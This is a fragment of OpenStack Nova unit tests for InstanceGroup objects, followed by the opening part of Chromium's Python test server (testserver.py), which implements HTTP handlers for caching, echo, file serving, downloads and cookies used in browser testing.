obj = objects.InstanceGroup(context=mock.sentinel.ctx)
obj.uuid = _DB_UUID
obj.name = _INST_GROUP_DB['name']
obj.user_id = _INST_GROUP_DB['user_id']
obj.project_id = _INST_GROUP_DB['project_id']
obj.members = _INST_GROUP_DB['members']
obj.policies = _INST_GROUP_DB['policies']
obj.updated_at = _TS_NOW
obj.created_at = _TS_NOW
obj.deleted_at = None
obj.deleted = False
obj.create()
mock_db_create.assert_called_once_with(
mock.sentinel.ctx,
{'uuid': _DB_UUID,
'name': _INST_GROUP_DB['name'],
'user_id': _INST_GROUP_DB['user_id'],
'project_id': _INST_GROUP_DB['project_id'],
'created_at': _TS_NOW,
'updated_at': _TS_NOW,
'deleted_at': None,
'deleted': False,
},
members=_INST_GROUP_DB['members'],
policies=_INST_GROUP_DB['policies'])
mock_notify.assert_called_once_with(
mock.sentinel.ctx, "create",
{'uuid': _DB_UUID,
'name': _INST_GROUP_DB['name'],
'user_id': _INST_GROUP_DB['user_id'],
'project_id': _INST_GROUP_DB['project_id'],
'created_at': _TS_NOW,
'updated_at': _TS_NOW,
'deleted_at': None,
'deleted': False,
'members': _INST_GROUP_DB['members'],
'policies': _INST_GROUP_DB['policies'],
'server_group_id': _DB_UUID})
self.assertRaises(exception.ObjectActionError, obj.create)
@mock.patch('nova.compute.utils.notify_about_server_group_update')
@mock.patch('nova.db.instance_group_delete')
def test_destroy(self, mock_db_delete, mock_notify):
obj = objects.InstanceGroup(context=mock.sentinel.ctx)
obj.uuid = _DB_UUID
obj.destroy()
mock_db_delete.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
mock_notify.assert_called_once_with(mock.sentinel.ctx, "delete",
{'server_group_id': _DB_UUID})
@mock.patch('nova.compute.utils.notify_about_server_group_update')
@mock.patch('nova.db.instance_group_members_add')
def test_add_members(self, mock_members_add_db, mock_notify):
mock_members_add_db.return_value = [mock.sentinel.members]
members = objects.InstanceGroup.add_members(mock.sentinel.ctx,
_DB_UUID,
mock.sentinel.members)
self.assertEqual([mock.sentinel.members], members)
mock_members_add_db.assert_called_once_with(
mock.sentinel.ctx,
_DB_UUID,
mock.sentinel.members)
mock_notify.assert_called_once_with(
mock.sentinel.ctx, "addmember",
{'instance_uuids': mock.sentinel.members,
'server_group_id': _DB_UUID})
@mock.patch('nova.objects.InstanceList.get_by_filters')
@mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
def test_count_members_by_user(self, mock_get_db, mock_il_get):
mock_il_get.return_value = [mock.ANY]
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
expected_filters = {
'uuid': ['instance_id1', 'instance_id2'],
'user_id': 'fake_user',
'deleted': False
}
self.assertEqual(1, obj.count_members_by_user('fake_user'))
mock_il_get.assert_called_once_with(mock.sentinel.ctx,
filters=expected_filters)
@mock.patch('nova.objects.InstanceList.get_by_filters')
@mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
def test_get_hosts(self, mock_get_db, mock_il_get):
mock_il_get.return_value = [objects.Instance(host='host1'),
objects.Instance(host='host2'),
objects.Instance(host=None)]
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
hosts = obj.get_hosts()
self.assertEqual(['instance_id1', 'instance_id2'], obj.members)
expected_filters = {
'uuid': ['instance_id1', 'instance_id2'],
'deleted': False
}
mock_il_get.assert_called_once_with(mock.sentinel.ctx,
filters=expected_filters)
self.assertEqual(2, len(hosts))
self.assertIn('host1', hosts)
self.assertIn('host2', hosts)
# Test manual exclusion
mock_il_get.reset_mock()
hosts = obj.get_hosts(exclude=['instance_id1'])
expected_filters = {
'uuid': set(['instance_id2']),
'deleted': False
}
mock_il_get.assert_called_once_with(mock.sentinel.ctx,
filters=expected_filters)
@mock.patch('nova.db.instance_group_get', return_value=_INST_GROUP_DB)
def test_obj_make_compatible(self, mock_db_get):
obj = objects.InstanceGroup.get_by_uuid(mock.sentinel.ctx, _DB_UUID)
obj_primitive = obj.obj_to_primitive()
self.assertNotIn('metadetails', obj_primitive)
obj.obj_make_compatible(obj_primitive, '1.6')
self.assertEqual({}, obj_primitive['metadetails'])
@mock.patch.object(objects.InstanceList, 'get_by_filters')
def test_load_hosts(self, mock_get_by_filt):
mock_get_by_filt.return_value = [objects.Instance(host='host1'),
objects.Instance(host='host2')]
obj = objects.InstanceGroup(mock.sentinel.ctx, members=['uuid1'])
self.assertEqual(2, len(obj.hosts))
self.assertIn('host1', obj.hosts)
self.assertIn('host2', obj.hosts)
self.assertNotIn('hosts', obj.obj_what_changed())
def test_load_anything_else_but_hosts(self):
obj = objects.InstanceGroup(mock.sentinel.ctx)
self.assertRaises(exception.ObjectActionError, getattr, obj, 'members')
class TestInstanceGroupObject(test_objects._LocalTest,
_TestInstanceGroupObject):
pass
class TestRemoteInstanceGroupObject(test_objects._RemoteTest,
_TestInstanceGroupObject):
pass
def _mock_db_list_get(*args):
instances = [(str(uuid.uuid4()), 'f1', 'p1'),
(str(uuid.uuid4()), 'f2', 'p1'),
(str(uuid.uuid4()), 'f3', 'p2'),
(str(uuid.uuid4()), 'f4', 'p2')]
result = []
for instance in instances:
values = copy.deepcopy(_INST_GROUP_DB)
values['uuid'] = instance[0]
values['name'] = instance[1]
values['project_id'] = instance[2]
result.append(values)
return result
class _TestInstanceGroupListObject(object):
@mock.patch('nova.db.instance_group_get_all')
def test_list_all(self, mock_db_get):
mock_db_get.side_effect = _mock_db_list_get
inst_list = objects.InstanceGroupList.get_all(mock.sentinel.ctx)
self.assertEqual(4, len(inst_list.objects))
mock_db_get.assert_called_once_with(mock.sentinel.ctx)
@mock.patch('nova.db.instance_group_get_all_by_project_id')
def test_list_by_project_id(self, mock_db_get):
mock_db_get.side_effect = _mock_db_list_get
objects.InstanceGroupList.get_by_project_id(
mock.sentinel.ctx, mock.sentinel.project_id)
mock_db_get.assert_called_once_with(
mock.sentinel.ctx, mock.sentinel.project_id)
@mock.patch('nova.db.instance_group_get_all_by_project_id')
def test_get_by_name(self, mock_db_get):
mock_db_get.side_effect = _mock_db_list_get
# Need the project_id value set, otherwise we'd use mock.sentinel
mock_ctx = mock.MagicMock()
mock_ctx.project_id = 'fake_project'
ig = objects.InstanceGroup.get_by_name(mock_ctx, 'f1')
mock_db_get.assert_called_once_with(mock_ctx, 'fake_project')
self.assertEqual('f1', ig.name)
self.assertRaises(exception.InstanceGroupNotFound,
objects.InstanceGroup.get_by_name,
mock_ctx, 'unknown')
@mock.patch('nova.objects.InstanceGroup.get_by_uuid')
@mock.patch('nova.objects.InstanceGroup.get_by_name')
def test_get_by_hint(self, mock_name, mock_uuid):
objects.InstanceGroup.get_by_hint(mock.sentinel.ctx, _DB_UUID)
mock_uuid.assert_called_once_with(mock.sentinel.ctx, _DB_UUID)
objects.InstanceGroup.get_by_hint(mock.sentinel.ctx, 'name')
mock_name.assert_called_once_with(mock.sentinel.ctx, 'name')
class TestInstanceGroupListObject(test_objects._LocalTest,
_TestInstanceGroupListObject):
pass
class TestRemoteInstanceGroupListObject(test_objects._RemoteTest,
_TestInstanceGroupListObject):
pass
| apache-2.0 |
mogoweb/chromium-crosswalk | net/tools/testserver/testserver.py | 2 | 74923 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a simple HTTP/FTP/TCP/UDP/BASIC_AUTH_PROXY/WEBSOCKET server used for
testing Chrome.
It supports several test URLs, as specified by the handlers in TestPageHandler.
By default, it listens on an ephemeral port and sends the port number back to
the originating process over a pipe. The originating process can specify an
explicit port if necessary.
It can use https if you specify the flag --https=CERT where CERT is the path
to a pem file containing the certificate and private key that should be used.
"""
import base64
import BaseHTTPServer
import cgi
import hashlib
import logging
import minica
import os
import json
import random
import re
import select
import socket
import SocketServer
import struct
import sys
import threading
import time
import urllib
import urlparse
import zlib
import echo_message
import pyftpdlib.ftpserver
import testserver_base
import tlslite
import tlslite.api
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(
0, os.path.join(BASE_DIR, '..', '..', '..', 'third_party/pywebsocket/src'))
from mod_pywebsocket.standalone import WebSocketServer
SERVER_HTTP = 0
SERVER_FTP = 1
SERVER_TCP_ECHO = 2
SERVER_UDP_ECHO = 3
SERVER_BASIC_AUTH_PROXY = 4
SERVER_WEBSOCKET = 5
# Default request queue size for WebSocketServer.
_DEFAULT_REQUEST_QUEUE_SIZE = 128
class WebSocketOptions:
"""Holds options for WebSocketServer."""
def __init__(self, host, port, data_dir):
self.request_queue_size = _DEFAULT_REQUEST_QUEUE_SIZE
self.server_host = host
self.port = port
self.websock_handlers = data_dir
self.scan_dir = None
self.allow_handlers_outside_root_dir = False
self.websock_handlers_map_file = None
self.cgi_directories = []
self.is_executable_method = None
self.allow_draft75 = False
self.strict = True
self.use_tls = False
self.private_key = None
self.certificate = None
self.tls_client_auth = False
self.tls_client_ca = None
self.use_basic_auth = False
class RecordingSSLSessionCache(object):
"""RecordingSSLSessionCache acts as a TLS session cache and maintains a log of
lookups and inserts in order to test session cache behaviours."""
def __init__(self):
self.log = []
def __getitem__(self, sessionID):
self.log.append(('lookup', sessionID))
raise KeyError()
def __setitem__(self, sessionID, session):
self.log.append(('insert', sessionID))
class HTTPServer(testserver_base.ClientRestrictingServerMixIn,
testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""This is a specialization of StoppableHTTPServer that adds client
verification."""
pass
class OCSPServer(testserver_base.ClientRestrictingServerMixIn,
testserver_base.BrokenPipeHandlerMixIn,
BaseHTTPServer.HTTPServer):
"""This is a specialization of HTTPServer that serves an
OCSP response"""
def serve_forever_on_thread(self):
self.thread = threading.Thread(target = self.serve_forever,
name = "OCSPServerThread")
self.thread.start()
def stop_serving(self):
self.shutdown()
self.thread.join()
class HTTPSServer(tlslite.api.TLSSocketServerMixIn,
testserver_base.ClientRestrictingServerMixIn,
testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""This is a specialization of StoppableHTTPServer that add https support and
client verification."""
def __init__(self, server_address, request_hander_class, pem_cert_and_key,
ssl_client_auth, ssl_client_cas, ssl_bulk_ciphers,
record_resume_info, tls_intolerant):
self.cert_chain = tlslite.api.X509CertChain().parseChain(pem_cert_and_key)
# Force using only python implementation - otherwise behavior is different
# depending on whether m2crypto Python module is present (error is thrown
# when it is). m2crypto uses a C (based on OpenSSL) implementation under
# the hood.
self.private_key = tlslite.api.parsePEMKey(pem_cert_and_key,
private=True,
implementations=['python'])
self.ssl_client_auth = ssl_client_auth
self.ssl_client_cas = []
self.tls_intolerant = tls_intolerant
for ca_file in ssl_client_cas:
s = open(ca_file).read()
x509 = tlslite.api.X509()
x509.parse(s)
self.ssl_client_cas.append(x509.subject)
self.ssl_handshake_settings = tlslite.api.HandshakeSettings()
if ssl_bulk_ciphers is not None:
self.ssl_handshake_settings.cipherNames = ssl_bulk_ciphers
if record_resume_info:
# If record_resume_info is true then we'll replace the session cache with
# an object that records the lookups and inserts that it sees.
self.session_cache = RecordingSSLSessionCache()
else:
self.session_cache = tlslite.api.SessionCache()
testserver_base.StoppableHTTPServer.__init__(self,
server_address,
request_hander_class)
def handshake(self, tlsConnection):
"""Creates the SSL connection."""
try:
self.tlsConnection = tlsConnection
tlsConnection.handshakeServer(certChain=self.cert_chain,
privateKey=self.private_key,
sessionCache=self.session_cache,
reqCert=self.ssl_client_auth,
settings=self.ssl_handshake_settings,
reqCAs=self.ssl_client_cas,
tlsIntolerant=self.tls_intolerant)
tlsConnection.ignoreAbruptClose = True
return True
except tlslite.api.TLSAbruptCloseError:
# Ignore abrupt close.
return True
except tlslite.api.TLSError, error:
print "Handshake failure:", str(error)
return False
class FTPServer(testserver_base.ClientRestrictingServerMixIn,
pyftpdlib.ftpserver.FTPServer):
"""This is a specialization of FTPServer that adds client verification."""
pass
class TCPEchoServer(testserver_base.ClientRestrictingServerMixIn,
SocketServer.TCPServer):
"""A TCP echo server that echoes back what it has received."""
def server_bind(self):
"""Override server_bind to store the server name."""
SocketServer.TCPServer.server_bind(self)
host, port = self.socket.getsockname()[:2]
self.server_name = socket.getfqdn(host)
self.server_port = port
def serve_forever(self):
self.stop = False
self.nonce_time = None
while not self.stop:
self.handle_request()
self.socket.close()
class UDPEchoServer(testserver_base.ClientRestrictingServerMixIn,
SocketServer.UDPServer):
"""A UDP echo server that echoes back what it has received."""
def server_bind(self):
"""Override server_bind to store the server name."""
SocketServer.UDPServer.server_bind(self)
host, port = self.socket.getsockname()[:2]
self.server_name = socket.getfqdn(host)
self.server_port = port
def serve_forever(self):
self.stop = False
self.nonce_time = None
while not self.stop:
self.handle_request()
self.socket.close()
class TestPageHandler(testserver_base.BasePageHandler):
# Class variables to allow for persistence state between page handler
# invocations
rst_limits = {}
fail_precondition = {}
def __init__(self, request, client_address, socket_server):
connect_handlers = [
self.RedirectConnectHandler,
self.ServerAuthConnectHandler,
self.DefaultConnectResponseHandler]
get_handlers = [
self.NoCacheMaxAgeTimeHandler,
self.NoCacheTimeHandler,
self.CacheTimeHandler,
self.CacheExpiresHandler,
self.CacheProxyRevalidateHandler,
self.CachePrivateHandler,
self.CachePublicHandler,
self.CacheSMaxAgeHandler,
self.CacheMustRevalidateHandler,
self.CacheMustRevalidateMaxAgeHandler,
self.CacheNoStoreHandler,
self.CacheNoStoreMaxAgeHandler,
self.CacheNoTransformHandler,
self.DownloadHandler,
self.DownloadFinishHandler,
self.EchoHeader,
self.EchoHeaderCache,
self.EchoAllHandler,
self.ZipFileHandler,
self.FileHandler,
self.SetCookieHandler,
self.SetManyCookiesHandler,
self.ExpectAndSetCookieHandler,
self.SetHeaderHandler,
self.AuthBasicHandler,
self.AuthDigestHandler,
self.SlowServerHandler,
self.ChunkedServerHandler,
self.ContentTypeHandler,
self.NoContentHandler,
self.ServerRedirectHandler,
self.ClientRedirectHandler,
self.MultipartHandler,
self.GetSSLSessionCacheHandler,
self.SSLManySmallRecords,
self.GetChannelID,
self.CloseSocketHandler,
self.RangeResetHandler,
self.DefaultResponseHandler]
post_handlers = [
self.EchoTitleHandler,
self.EchoHandler,
self.PostOnlyFileHandler,
self.EchoMultipartPostHandler] + get_handlers
put_handlers = [
self.EchoTitleHandler,
self.EchoHandler] + get_handlers
head_handlers = [
self.FileHandler,
self.DefaultResponseHandler]
self._mime_types = {
'crx' : 'application/x-chrome-extension',
'exe' : 'application/octet-stream',
'gif': 'image/gif',
'jpeg' : 'image/jpeg',
'jpg' : 'image/jpeg',
'json': 'application/json',
'pdf' : 'application/pdf',
'txt' : 'text/plain',
'wav' : 'audio/wav',
'xml' : 'text/xml'
}
self._default_mime_type = 'text/html'
testserver_base.BasePageHandler.__init__(self, request, client_address,
socket_server, connect_handlers,
get_handlers, head_handlers,
post_handlers, put_handlers)
def GetMIMETypeFromName(self, file_name):
"""Returns the mime type for the specified file_name. So far it only looks
at the file extension."""
(_shortname, extension) = os.path.splitext(file_name.split("?")[0])
if len(extension) == 0:
# no extension.
return self._default_mime_type
# extension starts with a dot, so we need to remove it
return self._mime_types.get(extension[1:], self._default_mime_type)
def NoCacheMaxAgeTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and no caching requested."""
if not self._ShouldHandleRequest("/nocachetime/maxage"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def NoCacheTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and no caching requested."""
if not self._ShouldHandleRequest("/nocachetime"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'no-cache')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheTimeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for one minute."""
if not self._ShouldHandleRequest("/cachetime"):
return False
self.send_response(200)
self.send_header('Cache-Control', 'max-age=60')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheExpiresHandler(self):
"""This request handler yields a page with the title set to the current
system time, and set the page to expire on 1 Jan 2099."""
if not self._ShouldHandleRequest("/cache/expires"):
return False
self.send_response(200)
self.send_header('Expires', 'Thu, 1 Jan 2099 00:00:00 GMT')
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheProxyRevalidateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 60 seconds"""
if not self._ShouldHandleRequest("/cache/proxy-revalidate"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, proxy-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CachePrivateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 5 seconds."""
if not self._ShouldHandleRequest("/cache/private"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=3, private')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CachePublicHandler(self):
"""This request handler yields a page with the title set to the current
system time, and allows caching for 5 seconds."""
if not self._ShouldHandleRequest("/cache/public"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=3, public')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheSMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow for caching."""
if not self._ShouldHandleRequest("/cache/s-maxage"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'public, s-maxage = 60, max-age = 0')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheMustRevalidateHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow caching."""
if not self._ShouldHandleRequest("/cache/must-revalidate"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'must-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheMustRevalidateMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow caching event though max-age of 60
seconds is specified."""
if not self._ShouldHandleRequest("/cache/must-revalidate/max-age"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, must-revalidate')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoStoreHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the page to be stored."""
if not self._ShouldHandleRequest("/cache/no-store"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-store')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoStoreMaxAgeHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the page to be stored even though max-age
of 60 seconds is specified."""
if not self._ShouldHandleRequest("/cache/no-store/max-age"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=60, no-store')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def CacheNoTransformHandler(self):
"""This request handler yields a page with the title set to the current
system time, and does not allow the content to transformed during
user-agent caching"""
if not self._ShouldHandleRequest("/cache/no-transform"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-transform')
self.end_headers()
self.wfile.write('<html><head><title>%s</title></head></html>' %
time.time())
return True
def EchoHeader(self):
"""This handler echoes back the value of a specific request header."""
return self.EchoHeaderHelper("/echoheader")
def EchoHeaderCache(self):
"""This function echoes back the value of a specific request header while
allowing caching for 16 hours."""
return self.EchoHeaderHelper("/echoheadercache")
def EchoHeaderHelper(self, echo_header):
"""This function echoes back the value of the request header passed in."""
if not self._ShouldHandleRequest(echo_header):
return False
query_char = self.path.find('?')
if query_char != -1:
header_name = self.path[query_char+1:]
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
if echo_header == '/echoheadercache':
self.send_header('Cache-control', 'max-age=60000')
else:
self.send_header('Cache-control', 'no-cache')
# insert a vary header to properly indicate that the cachability of this
# request is subject to value of the request header being echoed.
if len(header_name) > 0:
self.send_header('Vary', header_name)
self.end_headers()
if len(header_name) > 0:
self.wfile.write(self.headers.getheader(header_name))
return True
def ReadRequestBody(self):
"""This function reads the body of the current HTTP request, handling
both plain and chunked transfer encoded requests."""
if self.headers.getheader('transfer-encoding') != 'chunked':
length = int(self.headers.getheader('content-length'))
return self.rfile.read(length)
# Read the request body as chunks.
body = ""
while True:
line = self.rfile.readline()
length = int(line, 16)
if length == 0:
self.rfile.readline()
break
body += self.rfile.read(length)
self.rfile.read(2)
return body
def EchoHandler(self):
"""This handler just echoes back the payload of the request, for testing
form submission."""
if not self._ShouldHandleRequest("/echo"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(self.ReadRequestBody())
return True
def EchoTitleHandler(self):
"""This handler is like Echo, but sets the page title to the request."""
if not self._ShouldHandleRequest("/echotitle"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
request = self.ReadRequestBody()
self.wfile.write('<html><head><title>')
self.wfile.write(request)
self.wfile.write('</title></head></html>')
return True
def EchoAllHandler(self):
"""This handler yields a (more) human-readable page listing information
about the request header & contents."""
if not self._ShouldHandleRequest("/echoall"):
return False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write('<html><head><style>'
'pre { border: 1px solid black; margin: 5px; padding: 5px }'
'</style></head><body>'
'<div style="float: right">'
'<a href="/echo">back to referring page</a></div>'
'<h1>Request Body:</h1><pre>')
if self.command == 'POST' or self.command == 'PUT':
qs = self.ReadRequestBody()
params = cgi.parse_qs(qs, keep_blank_values=1)
for param in params:
self.wfile.write('%s=%s\n' % (param, params[param][0]))
self.wfile.write('</pre>')
self.wfile.write('<h1>Request Headers:</h1><pre>%s</pre>' % self.headers)
self.wfile.write('</body></html>')
return True
def EchoMultipartPostHandler(self):
"""This handler echoes received multipart post data as json format."""
if not (self._ShouldHandleRequest("/echomultipartpost") or
self._ShouldHandleRequest("/searchbyimage")):
return False
content_type, parameters = cgi.parse_header(
self.headers.getheader('content-type'))
if content_type == 'multipart/form-data':
post_multipart = cgi.parse_multipart(self.rfile, parameters)
elif content_type == 'application/x-www-form-urlencoded':
raise Exception('POST by application/x-www-form-urlencoded is '
'not implemented.')
else:
post_multipart = {}
# Since the data can be binary, we encode them by base64.
post_multipart_base64_encoded = {}
for field, values in post_multipart.items():
post_multipart_base64_encoded[field] = [base64.b64encode(value)
for value in values]
result = {'POST_multipart' : post_multipart_base64_encoded}
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(json.dumps(result, indent=2, sort_keys=False))
return True
def DownloadHandler(self):
"""This handler sends a downloadable file with or without reporting
the size (6K)."""
if self.path.startswith("/download-unknown-size"):
send_length = False
elif self.path.startswith("/download-known-size"):
send_length = True
else:
return False
#
# The test which uses this functionality is attempting to send
# small chunks of data to the client. Use a fairly large buffer
# so that we'll fill chrome's IO buffer enough to force it to
# actually write the data.
# See also the comments in the client-side of this test in
# download_uitest.cc
#
size_chunk1 = 35*1024
size_chunk2 = 10*1024
self.send_response(200)
self.send_header('Content-Type', 'application/octet-stream')
self.send_header('Cache-Control', 'max-age=0')
if send_length:
self.send_header('Content-Length', size_chunk1 + size_chunk2)
self.end_headers()
# First chunk of data:
self.wfile.write("*" * size_chunk1)
self.wfile.flush()
# handle requests until one of them clears this flag.
self.server.wait_for_download = True
while self.server.wait_for_download:
self.server.handle_request()
# Second chunk of data:
self.wfile.write("*" * size_chunk2)
return True
def DownloadFinishHandler(self):
"""This handler just tells the server to finish the current download."""
if not self._ShouldHandleRequest("/download-finish"):
return False
self.server.wait_for_download = False
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'max-age=0')
self.end_headers()
return True
def _ReplaceFileData(self, data, query_parameters):
"""Replaces matching substrings in a file.
If the 'replace_text' URL query parameter is present, it is expected to be
of the form old_text:new_text, which indicates that any old_text strings in
the file are replaced with new_text. Multiple 'replace_text' parameters may
be specified.
If the parameters are not present, |data| is returned.
"""
query_dict = cgi.parse_qs(query_parameters)
replace_text_values = query_dict.get('replace_text', [])
for replace_text_value in replace_text_values:
replace_text_args = replace_text_value.split(':')
if len(replace_text_args) != 2:
raise ValueError(
'replace_text must be of form old_text:new_text. Actual value: %s' %
replace_text_value)
old_text_b64, new_text_b64 = replace_text_args
old_text = base64.urlsafe_b64decode(old_text_b64)
new_text = base64.urlsafe_b64decode(new_text_b64)
data = data.replace(old_text, new_text)
return data
def ZipFileHandler(self):
"""This handler sends the contents of the requested file in compressed form.
Can pass in a parameter that specifies that the content length be
C - the compressed size (OK),
U - the uncompressed size (Non-standard, but handled),
S - less than compressed (OK because we keep going),
M - larger than compressed but less than uncompressed (an error),
L - larger than uncompressed (an error)
Example: compressedfiles/Picture_1.doc?C
"""
prefix = "/compressedfiles/"
if not self.path.startswith(prefix):
return False
# Consume a request body if present.
if self.command == 'POST' or self.command == 'PUT' :
self.ReadRequestBody()
_, _, url_path, _, query, _ = urlparse.urlparse(self.path)
if not query in ('C', 'U', 'S', 'M', 'L'):
return False
sub_path = url_path[len(prefix):]
entries = sub_path.split('/')
file_path = os.path.join(self.server.data_dir, *entries)
if os.path.isdir(file_path):
file_path = os.path.join(file_path, 'index.html')
if not os.path.isfile(file_path):
print "File not found " + sub_path + " full path:" + file_path
self.send_error(404)
return True
f = open(file_path, "rb")
data = f.read()
uncompressed_len = len(data)
f.close()
# Compress the data.
data = zlib.compress(data)
compressed_len = len(data)
content_length = compressed_len
if query == 'U':
content_length = uncompressed_len
elif query == 'S':
content_length = compressed_len / 2
elif query == 'M':
content_length = (compressed_len + uncompressed_len) / 2
elif query == 'L':
content_length = compressed_len + uncompressed_len
self.send_response(200)
self.send_header('Content-Type', 'application/msword')
self.send_header('Content-encoding', 'deflate')
self.send_header('Connection', 'close')
self.send_header('Content-Length', content_length)
self.send_header('ETag', '\'' + file_path + '\'')
self.end_headers()
self.wfile.write(data)
return True
def FileHandler(self):
"""This handler sends the contents of the requested file. Wow, it's like
a real webserver!"""
prefix = self.server.file_root_url
if not self.path.startswith(prefix):
return False
return self._FileHandlerHelper(prefix)
def PostOnlyFileHandler(self):
"""This handler sends the contents of the requested file on a POST."""
prefix = urlparse.urljoin(self.server.file_root_url, 'post/')
if not self.path.startswith(prefix):
return False
return self._FileHandlerHelper(prefix)
def _FileHandlerHelper(self, prefix):
request_body = ''
if self.command == 'POST' or self.command == 'PUT':
# Consume a request body if present.
request_body = self.ReadRequestBody()
_, _, url_path, _, query, _ = urlparse.urlparse(self.path)
query_dict = cgi.parse_qs(query)
expected_body = query_dict.get('expected_body', [])
if expected_body and request_body not in expected_body:
self.send_response(404)
self.end_headers()
self.wfile.write('')
return True
expected_headers = query_dict.get('expected_headers', [])
for expected_header in expected_headers:
header_name, expected_value = expected_header.split(':')
if self.headers.getheader(header_name) != expected_value:
self.send_response(404)
self.end_headers()
self.wfile.write('')
return True
sub_path = url_path[len(prefix):]
entries = sub_path.split('/')
file_path = os.path.join(self.server.data_dir, *entries)
if os.path.isdir(file_path):
file_path = os.path.join(file_path, 'index.html')
if not os.path.isfile(file_path):
print "File not found " + sub_path + " full path:" + file_path
self.send_error(404)
return True
f = open(file_path, "rb")
data = f.read()
f.close()
data = self._ReplaceFileData(data, query)
old_protocol_version = self.protocol_version
# If file.mock-http-headers exists, it contains the headers we
# should send. Read them in and parse them.
headers_path = file_path + '.mock-http-headers'
if os.path.isfile(headers_path):
f = open(headers_path, "r")
# "HTTP/1.1 200 OK"
response = f.readline()
http_major, http_minor, status_code = re.findall(
'HTTP/(\d+).(\d+) (\d+)', response)[0]
self.protocol_version = "HTTP/%s.%s" % (http_major, http_minor)
self.send_response(int(status_code))
for line in f:
header_values = re.findall('(\S+):\s*(.*)', line)
if len(header_values) > 0:
# "name: value"
name, value = header_values[0]
self.send_header(name, value)
f.close()
else:
# Could be more generic once we support mime-type sniffing, but for
# now we need to set it explicitly.
range_header = self.headers.get('Range')
if range_header and range_header.startswith('bytes='):
# Note this doesn't handle all valid byte range_header values (i.e.
# left open ended ones), just enough for what we needed so far.
range_header = range_header[6:].split('-')
start = int(range_header[0])
if range_header[1]:
end = int(range_header[1])
else:
end = len(data) - 1
self.send_response(206)
content_range = ('bytes ' + str(start) + '-' + str(end) + '/' +
str(len(data)))
self.send_header('Content-Range', content_range)
data = data[start: end + 1]
else:
self.send_response(200)
self.send_header('Content-Type', self.GetMIMETypeFromName(file_path))
self.send_header('Accept-Ranges', 'bytes')
self.send_header('Content-Length', len(data))
self.send_header('ETag', '\'' + file_path + '\'')
self.end_headers()
if (self.command != 'HEAD'):
self.wfile.write(data)
self.protocol_version = old_protocol_version
return True
def SetCookieHandler(self):
"""This handler just sets a cookie, for testing cookie handling."""
if not self._ShouldHandleRequest("/set-cookie"):
return False
query_char = self.path.find('?')
if query_char != -1:
cookie_values = self.path[query_char + 1:].split('&')
else:
cookie_values = ("",)
self.send_response(200)
self.send_header('Content-Type', 'text/html')
for cookie_value in cookie_values:
self.send_header('Set-Cookie', '%s' % cookie_value)
self.end_headers()
for cookie_value in cookie_values:
self.wfile.write('%s' % cookie_value)
return True
